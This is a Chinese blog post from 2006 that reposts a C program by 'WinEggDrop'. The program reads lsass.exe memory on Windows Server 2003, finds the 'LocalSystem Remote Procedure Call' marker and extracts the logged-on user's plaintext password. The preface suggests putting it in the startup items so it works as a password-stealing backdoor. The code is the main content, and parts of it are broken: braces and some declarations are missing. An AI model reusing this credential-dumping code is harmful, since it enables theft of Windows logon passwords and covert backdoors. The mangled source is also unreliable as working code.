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2006-04-20 18:56 267 查看

这里面有一点要注意,首先保存的密码是最近一次登陆的用户的密码,相对于“LocalSystem Remote Procedure Call (RPC)"的一定偏移处,WinEggDrop兄弟从这后面找到“02 00 00 00 00 00 00",然后之后的UNICODE数据就是明文的密码。在lsass进程中通常有两个地方有”LocalSystem Remote Procedure Call (RPC)“。但是密码只有第一处有。
其次,如果想做为一个偷密码的后门的话,就做个程序加入到启动项,在执行时肯定就是当前登陆用户的密码, ^_^


// Version: V1.0
// Coder: WinEggDrop
// Date Release: 12/15/2004
// Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method
// Used Is Pretty Unwise,But This May Be The Only Way To Review The
// Logon User's Password On Windows 2003.
// Test PlatForm: Windows 2003
// Compiled On: VC++ 6.0
#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>

#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable

char Password[MAX_PATH] = {0}; // Store The Found Password

// Function ProtoType Declaration
BOOL FindPassword(DWORD PID);
int Search(char *Buffer,const UINT nSize);
DWORD GetLsassPID();
BOOL Is2003();
// End Of Fucntion ProtoType Declaration

int main()
printf("Windows 2003 Password Viewer V1.0 By WinEggDrop/n/n");

if (!Is2003()) // Check Out If The Box Is 2003
printf("The Program Can't Only Run On Windows 2003 Platform/n");
return -1;

PID = GetLsassPID(); // Get The Lsass.exe PID

if (PID == 0) // Fail To Get PID If Returning Zerom
return -1;

FindPassword(PID); // Find The Password From Lsass.exe Memory
return 0;
// End main()

// Purpose: Search The Memory & Try To Get The Password
// Return Type: int
// Parameters:
// In: char *Buffer --> The Memory Buffer To Search
// Out: const UINT nSize --> The Size Of The Memory Buffer
// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",
// Since The Password Is Near The Above Location,But It's Not Always True That
// We Will Find The Magic String,Or Even We Find It,The Password May Be Located
// At Some Other Place.We Only Look For Luck
int Search(char *Buffer,const UINT nSize)
UINT OffSet = 0;
UINT i = 0;
UINT j = 0 ;
UINT Count = 0;
if (Buffer == NULL)
return -1;

for (i = 0 ; i < nSize ; i++)
/* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word
Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate
The Magic String,We Have To Do It Manually And Slowly
if (Buffer[i] == 'L')
OffSet = 0;
if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)
OffSet += strlen("LocalSystem") + 1;
if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)
OffSet += strlen("Remote") + 1;
if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)
OffSet += strlen("Procedure") + 1;
if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)
i += OffSet;
if (i < nSize)
for (; i < nSize ; i++)
if (Buffer[i] == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0)
/* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In
That Way
j = i + 7;
for (; j < nSize; j += 2)
if (Buffer[j] > 0)
Password[Count++] = Buffer[j];
return i + 7; // One Flag To Indicate We Find The Password
return -1; // Well,We Fail To Find The Password,And This Always Happens
// End Search

// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
// Parameters: None
HANDLE hProcessSnap;
HANDLE hProcess = NULL;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if( hProcessSnap == INVALID_HANDLE_VALUE )
printf("Fail To Create Snap Shot/n");
return 0;

pe32.dwSize = sizeof(PROCESSENTRY32);

if( !Process32First(hProcessSnap, &pe32))
CloseHandle(hProcessSnap); // Must clean up the snapshot object!
return 0;

if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)
PID = pe32.th32ProcessID;
}while(Process32Next( hProcessSnap, &pe32));

CloseHandle( hProcessSnap);
return PID;
// End GetLsassPID()

// Purpose: To Find The Password
// Return Type: BOOLEAN
// Parameters:
// In: DWORD PID -> The Lsass.exe's PID
BOOL FindPassword(DWORD PID)
HANDLE hProcess = NULL;
char Buffer[5 * 1024] = {0};
DWORD ByteGet = 0;
int Found = -1;

hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process
if (hProcess == NULL)
printf("Fail To Open Process/n");
return FALSE;

if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet)) // Read The Memory From Lsass.exe
printf("Fail To Read Memory/n");
return FALSE;


Found = Search(Buffer,ByteGet); // Search The Password
if (Found >= 0) // We May Find The Password
if (strlen(Password) > 0) // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not
printf("Found Password At #0x%x -> /"%s/"/n",Found + BaseAddress,Password);
printf("Fail To Find The Password/n");
return TRUE;
// End FindPassword

// Purpose: Check If The Box Is Windows 2003
// Return Type: BOOLEAN
// Parameters: None
BOOL Is2003()
BOOL b0sVersionInfoEx;

if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))
return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);
// End Is2003()
// End Of File
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